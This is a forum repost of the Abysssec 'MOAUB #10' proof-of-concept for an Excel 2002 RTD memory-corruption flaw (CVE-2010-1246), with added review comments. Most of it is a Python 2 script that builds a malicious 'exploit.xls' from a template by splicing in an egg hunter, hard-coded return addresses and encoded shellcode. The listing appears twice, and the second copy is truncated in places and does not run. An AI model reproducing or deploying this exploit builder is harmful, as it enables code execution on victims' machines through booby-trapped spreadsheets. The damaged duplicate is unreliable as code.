[转帖]MOAUB #10 - Excel RTD Memory Corruption
发表于: 2010-9-11 22:02 2464
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
0e5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1x3e0m8Q4x3X3c8W2P5r3y4W2L8q4)9J5k6s2u0@1k6q4)9J5k6r3#2W2L8h3!0J5P5g2)9J5k6r3y4G2M7Y4u0#2M7s2c8A6L8$3&6Q4x3V1j5`.
78dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8Y4y4H3L8r3!0A6N6s2y4Q4x3V1k6E0L8$3q4#2j5W2)9J5k6o6p5H3i4K6u0V1k6i4S2H3L8r3!0A6N6q4)9J5k6i4A6A6M7l9`.`.
'''
'''
Title : Excel RTD Memory Corruption
Version : Excel 2002 sp3
Analysis : edbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0
Vendor : 896K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8b7`.`.
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1246
MOAUB Number : MOAUB_10_BA
'''
import sys
# Proof-of-concept file builder for the issue the header labels CVE-2010-1246:
# it reads a template workbook 'src.xls', keeps three byte ranges of it, and
# writes 'exploit.xls' with the two dropped ranges replaced by fixed payload bytes.
# NOTE(review): this listing lost its indentation when it was pasted, so the
# nesting of the statements below cannot be recovered from the page; the bare
# `print` statements are Python 2 syntax.
# NOTE(review, defence): the header lists Excel 2002 SP3 as the affected version;
# the practical mitigation is the vendor update for the CVE named there.
def main():
try:
# The template is opened 'rb+' although it is only read here. Neither handle
# is closed on the early `return`s or when IOError is raised (no `with`).
fdR = open('src.xls', 'rb+')
strTotal = fdR.read()
# Kept template ranges: [0:4509], [5013:15000], [15800:]. The two gaps
# (504 bytes and 800 bytes) are what gets overwritten further down.
str1 = strTotal[:4509]
str2 = strTotal[5013:15000]
str3 = strTotal[15800:]
# Two hard-coded 4-byte little-endian values (0x300057AD and 0x3003C2F7).
# Fixed absolute addresses only make sense against one specific, non-relocated
# module image - presumably the Excel build named in the header, TODO confirm;
# the page does not say which module they point into.
eip = "\xAd\x57\x00\x30" # pop pop ret
jmp = "\xF7\xC2\x03\x30" # call esp
#Egg Hunter
# The 4-byte tag "\x63\x70\x74\x6e" (ASCII "cptn") is embedded in this stub and
# appears twice at the start of `shellcode` below.
# NOTE(review, detection): the doubled ASCII tag followed by a 0x90 run inside an
# .xls is a static indicator for this exact sample only; it is a free choice of
# the author, so it should not be the sole detection logic.
eggHunter = ""
eggHunter += "\x90\x90\x90"
eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"
# shellcode calc.exe
shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
# Both buffers are forced to an exact size (266 and 800 bytes) by appending
# 0x90 bytes, after rejecting anything longer than the slot.
# NOTE(review): the message for the eggHunter check also says "Shellcode".
# The `<=` tests look redundant once the `>` branch has returned - assuming the
# `return` belongs to that branch, which the lost indentation leaves unconfirmed.
if len(eggHunter) > 266:
print " Error : Shellcode length is long"
return
if len(eggHunter) <=266:
dif =266 - len(eggHunter)
while dif > 0 :
eggHunter += '\x90'
dif = dif - 1
if len(shellcode) > 800:
print " Error : Shellcode length is long"
return
if len(shellcode) <= 800:
dif = 800 - len(shellcode)
while dif > 0 :
shellcode += '\x90'
dif = dif - 1
# First gap: 3 + 4 + 266 + 4 + 4 + 6 + 1 + 54*4 = 504 bytes, exactly the size of
# the dropped range [4509:5013]; the second gap [15000:15800] takes the 800-byte
# buffer. For a template of at least 15800 bytes the output therefore has the
# same length as the input, so file size alone does not distinguish the two.
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("\x41\x41\x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
# Not commented by the author; EB 06 is the x86 short-jump encoding, followed
# by two filler bytes.
fdW.write("\xeb\x06\x41\x41")
fdW.write(eip)
# NOTE(review): the immediate written here is 0x00001624 (5668 decimal); the
# "2016" in the author's inline comment does not match the bytes.
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016
fdW.write("\xc3") #ret
i = 0
while i < 54 :
fdW.write("\x41\x41\x41\x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-] Excel file generated'
# Any IOError from the open/read/write calls above ends the script with status -1.
except IOError:
print ' Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
# Run the builder only when the file is executed as a script.
if __name__ == '__main__':
main()
看到有人把#9的转过来了,那么我也继续下,把#10的转来吧
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
0e5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1x3e0m8Q4x3X3c8W2P5r3y4W2L8q4)9J5k6s2u0@1k6q4)9J5k6r3#2W2L8h3!0J5P5g2)9J5k6r3y4G2M7Y4u0#2M7s2c8A6L8$3&6Q4x3V1j5`.
78dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8Y4y4H3L8r3!0A6N6s2y4Q4x3V1k6E0L8$3q4#2j5W2)9J5k6o6p5H3i4K6u0V1k6i4S2H3L8r3!0A6N6q4)9J5k6i4A6A6M7l9`.`.
'''
'''
Title : Excel RTD Memory Corruption
Version : Excel 2002 sp3
Analysis : edbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0
Vendor : 896K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6j5%4u0G2M7$3!0X3N6q4)9J5k6h3y4G2L8b7`.`.
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1246
MOAUB Number : MOAUB_10_BA
'''
import sys
# NOTE(review): this is a second, damaged copy of the same listing on this page.
# Three `print` lines below are cut off after the opening quote (the first copy
# carries the full messages and the `return` statements), so this copy does not
# parse as written. Indentation is lost here as well, and the `print` statements
# are Python 2 syntax.
# What the visible code does: read 'src.xls', keep the byte ranges [0:4509],
# [5013:15000] and [15800:], and write 'exploit.xls' with the two dropped ranges
# (504 and 800 bytes) replaced by fixed payload bytes of the same total size.
def main():
try:
# Opened 'rb+' although only read; no `with`, so the handle is not closed if
# IOError is raised.
fdR = open('src.xls', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:4509]
str2 = strTotal[5013:15000]
str3 = strTotal[15800:]
# Hard-coded little-endian values 0x300057AD and 0x3003C2F7; fixed absolute
# addresses tie the sample to one specific non-relocated module image
# (presumably the Excel build named in the header - TODO confirm).
eip = "\xAd\x57\x00\x30" # pop pop ret
jmp = "\xF7\xC2\x03\x30" # call esp
#Egg Hunter
# The tag "\x63\x70\x74\x6e" (ASCII "cptn") is embedded here and doubled at the
# start of `shellcode` below.
eggHunter = ""
eggHunter += "\x90\x90\x90"
eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"
# shellcode calc.exe
shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
# Size guards and 0x90 padding to exactly 266 and 800 bytes. The two
# `print "` lines are the truncated error messages mentioned at the top.
if len(eggHunter) > 266:
print "
if len(eggHunter) <=266:
dif =266 - len(eggHunter)
while dif > 0 :
eggHunter += '\x90'
dif = dif - 1
if len(shellcode) > 800:
print "
if len(shellcode) <= 800:
dif = 800 - len(shellcode)
while dif > 0 :
shellcode += '\x90'
dif = dif - 1
# The pieces written between str1 and str2 add up to 504 bytes
# (3 + 4 + 266 + 4 + 4 + 6 + 1 + 54*4), matching the dropped range [4509:5013].
fdW= open('exploit.xls', 'wb+')
fdW.write(str1)
fdW.write("\x41\x41\x41") # padding
fdW.write(jmp)
fdW.write(eggHunter)
fdW.write("\xeb\x06\x41\x41")
fdW.write(eip)
# NOTE(review): the immediate is 0x00001624 (5668 decimal), which does not match
# the "2016" in the author's inline comment.
fdW.write("\x81\xc4\x24\x16\x00\x00") # add esp,2016
fdW.write("\xc3") #ret
i = 0
while i < 54 :
fdW.write("\x41\x41\x41\x41") # padding
i = i + 1
fdW.write(str2)
fdW.write(shellcode)
fdW.write(str3)
fdW.close()
fdR.close()
print '[-] Excel file generated'
# The message on the next `print` line is truncated in this copy.
except IOError:
print '
sys.exit(-1)
# Run the builder only when the file is executed as a script.
if __name__ == '__main__':
main()
看到有人把#9的转过来了,那么我也继续下,把#10的转来吧